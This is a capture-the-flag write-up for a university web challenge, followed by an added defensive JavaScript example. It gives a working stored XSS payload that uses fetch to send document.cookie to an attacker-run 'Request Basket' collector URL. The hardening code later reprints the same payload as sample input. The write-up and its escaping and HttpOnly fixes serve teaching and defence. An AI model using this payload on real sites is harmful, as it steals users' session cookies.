All dat cookies... njam njam!

Description

You found the flag of your dreams, but are still unsure if it is the best fit for you? We got you covered! You can send us your questions and we will do our best to look at your comments ASAP.

You can reach our shop at: https://sfl.cs.tu-dortmund.de:10004/

NOTE: Our shop admins are not supposed to visit external links, hence we block them. But you may find it useful to use our "Request Basket" instead: https://sfl.cs.tu-dortmund.de:10005/

Solution

The challenge description mentions a "Request Basket", so as a first step head to https://sfl.cs.tu-dortmund.de:10005/ and create one.

After that, let us head to a flag of our choice and take a look at the question section. After entering a question and clicking submit, we get a URL where we can look at the answer.

[Image: question form with a URL]

By visiting the provided link we come to the page where the (automated) shop staff tells us it is unable to help us. But what is more interesting: we can see the text we entered into the question form earlier, reflected back into the page.

[Image: question answer page]

What about entering some code? We could send a question with the following content:

<script> alert("I HAVE A QUESTION ABOUT YOUR SECURITY!") </script>

Interesting... Now the answer page has executed our code snippet and looks like this:

[Image: answer page with alert]

But sadly no sign of a Fl4g.

Let's combine this XSS with the "Request Basket" we created earlier. Use the following question, replacing your_request_bucket_url with the URL of your own basket:

<script> fetch("your_request_bucket_url?flag=" + document.cookie) </script>

After submitting the Question form, go over to the "Request Basket" and there is the flag:

[Image: Request Basket with flag]
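For completeness, here is the defender's view of the two weaknesses this writeup chains together. This is an added example written for this page, not code from the challenge or its authors: it reconstructs a minimal answer page renderer the way the writeup describes it (user input pasted straight into the HTML), places the hardened version next to it, and shows the cookie attribute that would have kept the flag out of `document.cookie` in the first place. The function and cookie names are assumptions made for the example.

```javascript
// Added example (not part of the original writeup). Two issues make the attack work:
//  1. the submitted question is reflected into the answer page without escaping (XSS), and
//  2. the session cookie is readable from document.cookie, so fetch() can carry it off.

// Escape the characters that let text break out of an HTML text node or attribute.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Reconstruction of the vulnerable behaviour: the question goes into the page verbatim.
function renderAnswerPageVulnerable(question) {
  return `<p>Sorry, we cannot help you with:</p><blockquote>${question}</blockquote>`;
}

// Hardened version: the question is escaped before insertion, so a <script> tag
// becomes inert text that the browser displays instead of executing.
function renderAnswerPageHardened(question) {
  return `<p>Sorry, we cannot help you with:</p><blockquote>${escapeHtml(question)}</blockquote>`;
}

// Set-Cookie value for the staff session (name and value are constructed for this example).
// HttpOnly removes the cookie from document.cookie, so even a successful XSS cannot read it;
// Secure and SameSite limit where the browser sends it.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Quick check a reviewer can run over rendered output: is there still a live <script> tag?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the exfiltration payload from the writeup.
const samplePayload =
  '<script> fetch("your_request_bucket_url?flag=" + document.cookie) </script>';

// Summary of both renderers on the sample payload.
function demonstrate() {
  return {
    vulnerableExecutes: containsLiveScript(renderAnswerPageVulnerable(samplePayload)), // true
    hardenedExecutes: containsLiveScript(renderAnswerPageHardened(samplePayload)),     // false
    cookie: sessionCookieHeader("session", "EXAMPLE_SESSION_VALUE"),
  };
}
```

Output encoding at the point where the question is written into HTML is the fix for the XSS itself; the HttpOnly attribute is defence in depth, since it turns a script-injection bug from "session stolen" into "page defaced" until the injection is fixed.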